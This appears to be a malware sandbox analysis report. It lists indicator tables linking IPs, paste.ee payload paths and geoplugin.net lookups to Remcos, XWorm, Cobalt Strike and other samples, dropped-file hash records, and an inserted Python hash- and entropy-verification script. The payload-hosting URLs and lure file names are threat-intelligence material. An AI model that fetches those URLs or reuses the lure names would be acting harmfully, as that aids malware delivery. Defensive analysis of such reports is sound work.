172.67.187.200 | Purchase Order PO0193832.vbs | malicious | Unknown | paste.ee/d/Bpplq
172.67.187.200 | Name.vbs | malicious | Unknown | paste.ee/d/0kkOm
172.67.187.200 | 517209487.vbs | malicious | XWorm | paste.ee/d/s0kJG
172.67.187.200 | screen_shots.vbs | malicious | XWorm | paste.ee/d/GoCAw
178.237.33.50 | 7Sbq4gMMlp.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | PO_0099822111ORDER.js | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | requests-pdf.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Documents.pdf | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | x295IO8kqM.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 7d74ApV4bb.exe | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta | malicious | Cobalt Strike, Remcos | geoplugin.net/json.gp
178.237.33.50 | SwiftCopy_PaymtRecpt121224.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | WO-663071 Sabiya Power Station Project.vbs | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 4JwhvqLe8n.exe | malicious | Remcos | geoplugin.net/json.gp
Match | Associated sample name / URL | Detection | Threat name | Context
paste.ee | PO_0099822111ORDER.js | malicious | Remcos | 104.21.84.67
paste.ee | NB PO-104105107108.xls | malicious | Unknown | 188.114.96.6
paste.ee | greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta | malicious | Cobalt Strike, Remcos | 104.21.84.67
paste.ee | goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta | malicious | Cobalt Strike, FormBook | 172.67.187.200
paste.ee | creamkissingthingswithcreambananapackagecreamy.hta | malicious | Cobalt Strike, Remcos | 104.21.84.67
paste.ee | Cot90012ARCACONTAL.xls | malicious | Remcos | 188.114.97.6
paste.ee | SOA USD67,353.35.xla.xlsx | malicious | Unknown | 188.114.97.6
paste.ee | Euro confirmation Sp.xls | malicious | Unknown | 188.114.96.6
paste.ee | print preview.js | malicious | FormBook | 172.67.187.200
paste.ee | nicegirlforyou.hta | malicious | Cobalt Strike, Remcos | 104.21.84.67
geoplugin.net | 7Sbq4gMMlp.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | PO_0099822111ORDER.js | malicious | Remcos | 178.237.33.50
geoplugin.net | requests-pdf.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | Documents.pdf | malicious | Remcos, DBatLoader | 178.237.33.50
geoplugin.net | x295IO8kqM.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | 7d74ApV4bb.exe | malicious | Remcos, DBatLoader | 178.237.33.50
geoplugin.net | greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
geoplugin.net | SwiftCopy_PaymtRecpt121224.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | WO-663071 Sabiya Power Station Project.vbs | malicious | Remcos | 178.237.33.50
geoplugin.net | 4JwhvqLe8n.exe | malicious | Remcos | 178.237.33.50
Match | Associated sample name / URL | Detection | Threat name | Context
AS-COLOCROSSINGUS | sh4.elf | malicious | Unknown | 107.172.24.189
AS-COLOCROSSINGUS | requests-pdf.exe | malicious | Remcos | 198.23.227.212
AS-COLOCROSSINGUS | NB PO-104105107108.xls | malicious | Unknown | 23.95.235.29
AS-COLOCROSSINGUS | jOlYP2b2P4.elf | malicious | Xmrig | 107.172.43.186
AS-COLOCROSSINGUS | smb.ps1 | malicious | Xmrig | 107.172.43.186
AS-COLOCROSSINGUS | AI7f43Z7AC.exe | malicious | Unknown | 107.172.88.151
AS-COLOCROSSINGUS | 3S52TCXLd6.exe | malicious | Xmrig | 107.172.43.186
AS-COLOCROSSINGUS | job.ps1 | malicious | DcRat, StormKitty, VenomRAT | 5.252.235.172
AS-COLOCROSSINGUS | job.ps1 | malicious | DcRat, StormKitty, VenomRAT | 5.252.235.172
AS-COLOCROSSINGUS | greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta | malicious | Cobalt Strike, Remcos | 192.3.101.149
                                                                                                              CLOUDFLARENETUShttps://zde.soundestlink.com/ce/c/675fab7ba82aca38b8d991e6/675fabf585cd17d1e3e2bb78/675fac13057112d43b540576?signature=da009f44f7cd45aeae4fbb5addf15ac91fbf725bb5e9405183f25bf1db8c8baaGet hashmaliciousUnknownBrowse
                                                                                                              • 104.26.10.61
                                                                                                              https://keepsmiling.co.in/front/indexxxx.html?em=NT43NUs6MllJO0ZdVTkzKSA8NzlDOkcgTjhWXU0=Get hashmaliciousUnknownBrowse
                                                                                                              • 104.21.89.91
                                                                                                              file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                              • 104.21.79.7
                                                                                                              http://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450Get hashmaliciousUnknownBrowse
                                                                                                              • 172.67.41.229
                                                                                                              1.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 1.8.62.108
                                                                                                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                              • 104.21.79.7
                                                                                                              Setup.msiGet hashmaliciousVidarBrowse
                                                                                                              • 104.21.52.25
                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                              • 172.67.164.37
                                                                                                              ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 172.69.163.246
                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, VidarBrowse
                                                                                                              • 172.67.177.250
Associated Sample Name / URL | Detection | Threat Name | Context
  3b5074b1b5d032e5620f69f9f700ff0ec2.hta | malicious | XWorm | 172.67.187.200
  file.exe | malicious | Amadey, LummaC Stealer, Vidar, Xmrig | 172.67.187.200
  SWIFT09181-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 172.67.187.200
  TD2HjoogPx.dll | malicious | Unknown | 172.67.187.200
  wmdqEYgW2i.exe | malicious | DCRat, PureLog Stealer, zgRAT | 172.67.187.200
  LaRHzSijsq.exe | malicious | DCRat | 172.67.187.200
  Whatsapp-GUI.exe | malicious | DarkGate, MailPassView | 172.67.187.200
  Whatsapp-GUI.exe | malicious | DarkGate, MailPassView | 172.67.187.200
  RdLfpZY5A9.exe | malicious | 77Rootkit, XWorm | 172.67.187.200
  FEDEX234598765.html | malicious | WinSearchAbuse | 172.67.187.200

No context
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (3454), with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):154352
                                                                                                              Entropy (8bit):3.8134053941949806
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:XNGVWmRC28eTt1DzYSyEgNGVWmRC28eTt1DzYSygNGVWmRC28eTt1DzYSy+:9q9t1DzYSKq9t1DzYSPq9t1DzYSN
                                                                                                              MD5:2E124153BE958647E84566B305ECF94E
                                                                                                              SHA1:D7D06FE6314EE8E4C31A971872632477EDE38248
                                                                                                              SHA-256:5B5835CEBCC79AE42D3EDC11DDCA5E2F6C4BF333E78D1B2D0733A091A9FD887E
                                                                                                              SHA-512:9BB7F048CFA817E406D63AFFC034EA89F7BEB6DD584521D5B1A531A032E22470BB9E9C8A12931B5838A77267ACF5FE64E8E788CAEE49C014348B75925614E450
                                                                                                              Malicious:false
                                                                                                              Preview:...... . . . .....N.g.p.H.G.G.o.p.q.f.z.b.u.I.i. .=. .".I.G.s.P.e.U.L.G.G.R.C.h.o.K.K.".....N.i.o.i.W.T.O.N.a.B.C.G.k.R.l. .=. .".q.W.G.k.Z.C.K.S.u.A.K.Z.H.C.C.".....s.L.k.q.r.P.L.L.W.P.d.O.L.z.A. .=. .".W.m.K.e.G.I.K.N.u.W.u.c.k.a.z.".........l.o.P.k.H.L.o.k.K.m.L.s.B.L.W. .=. .".i.U.W.K.i.p.L.I.K.t.u.i.p.W.N.".....A.i.U.u.K.n.k.d.b.K.R.L.P.L.u. .=. .".A.L.A.N.c.L.A.P.J.z.t.W.W.u.I.".....L.m.L.h.e.W.t.c.a.h.t.G.K.k.t. .=. .".R.C.Z.b.q.U.x.k.i.a.W.o.P.e.p.".....k.L.n.R.A.o.h.x.o.U.m.t.O.l.Q. .=. .".i.k.G.K.I.l.L.U.j.a.B.G.m.R.A.".....W.p.x.U.C.l.c.H.A.t.L.G.O.L.p. .=. .".j.C.P.u.R.o.c.B.S.W.G.o.W.i.K.".....Z.Z.W.c.G.i.f.I.O.o.x.s.O.u.G. .=. .".t.B.z.b.m.t.i.p.N.U.A.L.K.A.i.".....L.r.d.W.U.L.l.b.P.i.o.t.x.i.U. .=. .".L.W.I.A.x.L.L.i.m.c.a.L.P.A.t.".....p.k.Z.q.l.P.p.p.L.t.i.n.i.h.k. .=. .".p.L.k.t.b.C.U.L.L.P.L.d.p.G.A.".....l.Z.c.L.c.q.c.O.z.m.i.p.p.U.A. .=. .".G.x.G.H.W.C.T.z.x.Z.k.z.t.i.c.".....P.k.K.c.C.R.o.P.J.c.W.L.W.R.k. .=. .".N.W.h.t.N.b.p.U.x.R.O.b.a.x.q.".....o.S.d.K.b.J.Z.H.
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):963
                                                                                                              Entropy (8bit):5.018384957371898
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zz2:qlupdRNuKyGX85jvXhNlT3/7CcVKWro
                                                                                                              MD5:C9BB4D5FD5C8A01D20EBF8334B62AE54
                                                                                                              SHA1:D38895F4CBB44CB10B6512A19034F14A2FC40359
                                                                                                              SHA-256:767218EC255B7E851971A77B773C0ECC59DC0B179ECA46ABCC29047EEE6216AA
                                                                                                              SHA-512:2D412433053610C0229FB3B73A26C8FB684F0A4AB03A53D0533FDC52D4E9882C25037015ACE7D4A411214AA9FAA780A8D950A83B57B200A877E26D7890977157
                                                                                                              Malicious:false
                                                                                                              Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5829
                                                                                                              Entropy (8bit):4.901113710259376
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                              MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                              SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                              SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                              SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                              Malicious:false
                                                                                                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1144
                                                                                                              Entropy (8bit):5.290848674040258
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:32gSKco4KmZjKbmOIKod6lss4RPQoUP7mZ9t7J0gt/NKM9r8Hd:GgSU4xympgv4RIoUP7mZ9tK8NF9u
                                                                                                              MD5:4331E6279D847E92D6B654CECE4305BF
                                                                                                              SHA1:E52D3DA01374F7C5BF5C2BF2CCBB54C92AC388F5
                                                                                                              SHA-256:54D683F53266320AAC50FF4F42DF00F95741BC9D870304FAB2E7EC0E9CFA3E6A
                                                                                                              SHA-512:2F627A386BC8E0F7DC5E7BB0007DDFC4DD70874A5E35BAD2FFD033236141337C5F5B80D2844984A80FA9EAB9FC07B8D3DF8A43D6D64C18D1F2CE592DAD9CD404
                                                                                                              Malicious:false
                                                                                                              Preview:@...e...........................................................@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Dec 16 08:08:28 2024, 1st section name ".debug$S"
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1328
                                                                                                              Entropy (8bit):3.979229834509828
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:HNe9EuZfnGl5tWXDfHEwKEbsmfII+ycuZhN2oakSn9PNnqSqd:EBnGntWzrKPmg1ul2oa3nnqSK
                                                                                                              MD5:21B16C58DF745EB9C5395479631DDDD0
                                                                                                              SHA1:09F12D684D13388F6033D9ED97FE61963530A12C
                                                                                                              SHA-256:C2D081A051E2748B4C1206A9C6FBA61EF6768B043B6024A94DE56363F1B320B8
                                                                                                              SHA-512:DC9B5DF9DBB215B0C7A6FBF7DEB98408264F15FD0354DBB74E39C7E6F161710D12C110E9F053E57A2BEE2F4D658754F6454ADC83ADDD009CE3321B731BBDF057
                                                                                                              Malicious:false
                                                                                                              Preview:L....._g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\r1df4acf\CSC5F9E68122E144DC389875BBF6681BEA.TMP................|I.d1......w............4.......C:\Users\user\AppData\Local\Temp\RES38A1.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.1.d.f.4.a.c.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
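The dropped-file records above give size, 8-bit entropy and four digests per file. The script below, added here as an example and not code from Joe Sandbox or from the sample, recomputes those fields from recovered bytes so a record can be cross-checked, and shows why the UTF-16 PowerShell script listed at entropy 3.81 reads so low. It assumes the AppLocker probe file is the 59-character preview plus one trailing space, which is the only single-byte completion that reproduces both the reported size of 60 bytes and the reported entropy; the triage thresholds in `entropy_bucket` are this example's own, not the sandbox's.

```python
"""Recompute the per-file fields of a sandbox "dropped files" record (size,
8-bit entropy, MD5/SHA-1/SHA-256/SHA-512) so a report entry can be
cross-checked against the bytes actually recovered from disk.

Added example for this report; not code from Joe Sandbox or from the sample.
"""
import hashlib
import math
from collections import Counter

# Constructed input: the preview text of the dropped AppLocker probe file.
# The report lists 60 bytes; the visible preview is 59 characters, so one
# trailing space is ASSUMED here to make up the 60th byte.
APPLOCKER_TEST_FILE = b"# PowerShell test file to determine AppLocker lockdown mode "

# Fields copied from the report entry for that file (the ones we can recompute).
REPORT_ENTRY = {
    "Size (bytes)": 60,
    "Entropy (8bit)": 4.038920595031593,
    "MD5": "D17FE0A3F47BE24A6453E9EF58C94641",
}


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, 0.0..8.0: the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def digests(data: bytes) -> dict:
    """The four digests the report prints, in its upper-case hex form."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def verify_against_report(data: bytes, entry: dict) -> dict:
    """Return, per report field, whether the recovered bytes reproduce it."""
    computed = {"Size (bytes)": len(data), "Entropy (8bit)": shannon_entropy(data), **digests(data)}
    result = {}
    for field, expected in entry.items():
        got = computed[field]
        result[field] = abs(got - expected) < 1e-6 if isinstance(expected, float) else got == expected
    return result


def entropy_bucket(data: bytes) -> str:
    """Coarse triage label. Thresholds are this example's own, not the sandbox's.

    UTF-16LE text (like the dropped PowerShell script the report lists at 3.81)
    has a NUL in every other byte, which drags its entropy well below that of
    the same text in UTF-8, so it gets its own label instead of 'text'.
    """
    if not data:
        return "empty"
    h = shannon_entropy(data)
    nul_ratio = data.count(0) / len(data)
    if h >= 7.0:
        return "high"        # compressed, encrypted or packed payloads
    if nul_ratio >= 0.4 and h < 5.0:
        return "wide-text"   # UTF-16LE text, not a genuinely low-entropy blob
    if h <= 5.5:
        return "text"
    return "binary"


def encoding_entropies(text: str) -> tuple:
    """(UTF-8 entropy, UTF-16LE entropy) of the same text, to show the gap."""
    return shannon_entropy(text.encode("utf-8")), shannon_entropy(text.encode("utf-16-le"))


if __name__ == "__main__":
    print(verify_against_report(APPLOCKER_TEST_FILE, REPORT_ENTRY))
    print(digests(APPLOCKER_TEST_FILE))      # compare by eye with the record's digests
    print(entropy_bucket(APPLOCKER_TEST_FILE), encoding_entropies(APPLOCKER_TEST_FILE.decode()))
```

Run it against bytes carved from the analysis VM rather than the preview whenever possible: the preview is lossy (newlines and non-printables are shown as dots), so only the recovered file, not the preview, should be expected to reproduce the digests.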
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 15728640
Entropy (8bit): 0.10805027086476268
Encrypted: false
SSDEEP: 1536:+SB2jpSB2jFSjlK/Qw/ZweshzbOlqVqmesAzbIBl73esleszO/Z4zbU/L:+a6aOUueqVRIBYvOU
MD5: 9F6FBA8CABF6D4ECDD5B285F375D352B
SHA1: ED0D370573441F24C1FEF0F1D7A92DB58AA484D8
SHA-256: 4C764E2DF9F41B915772A2259A958DB29E6476693225882D1FBAE286C22AFB41
SHA-512: 75C78BF6271DBDFE3A044ADF75F84AF49867E63BD614F0A300A676A73A736432C16C2DA686177B01E01BE6018178CCD060FB009DA012AD876BFD632833046A0C
Malicious: false
Preview: n..y... ...................':...{........................Z.....9....{S......{w.h.\.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...................................H......{w.................2.G......{w..........................#......h.\.....................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type: Unicode text, UTF-16, little-endian text, with no line terminators
Category: dropped
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:Qn:Qn
MD5: F3B25701FE362EC84616A93A45CE9998
SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious: false
Preview: ..

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type: MSVC .res
Category: dropped
Size (bytes): 652
Entropy (8bit): 3.0923038887693326
Encrypted: false
SSDEEP: 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grycoak7Ynqqn9PN5Dlq5J:+RI+ycuZhN2oakSn9PNnqX
MD5: 7C49BC6431D4D98CD68A17A0F7779D06
SHA1: 547E6ED90B614C5880A9A0B76AE3C2404AD0B60B
SHA-256: 304AE69299BA0C828D966F78A750254156182018E2FD1D83414102F5C1630AF8
SHA-512: 069DB293C59621BCD5BFF4FF5A4B0021615B7713DF9C46C603FD7A77120F7118DB4836DCFD978F8D3884DE7BF8B540D69B0DB556B04D6C2DE229626D1E6319D9
Malicious: false
Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.1.d.f.4.a.c.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.1.d.f.4.a.c.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (361)
Category: dropped
Size (bytes): 475
Entropy (8bit): 3.6973410645091787
Encrypted: false
SSDEEP: 6:V/DsYLDS81zuJtk2mMmFFJQXReKJ8SRHy4Hgu+UYfJ6fdgFQy:V/DTLDfuJVXfH09K9y
MD5: 0C431E10CF228FE2C475697B04FF0EBB
SHA1: 04439E5D97E5C2E03F57CAF24564925B32D644CB
SHA-256: F0514C83D3A0460E90E267FBB96546F4B5890906EB7EA94799C38EC743FB91AE
SHA-512: 954A57476DAA5408F0FF679972741E63E8FE61FF20BDEFC40B83AD6FF633B0A7D5D3DDCE7CFAFF0A5FF0BC2300704F6C5639ADBF44F38A818D22644814E5EFCB
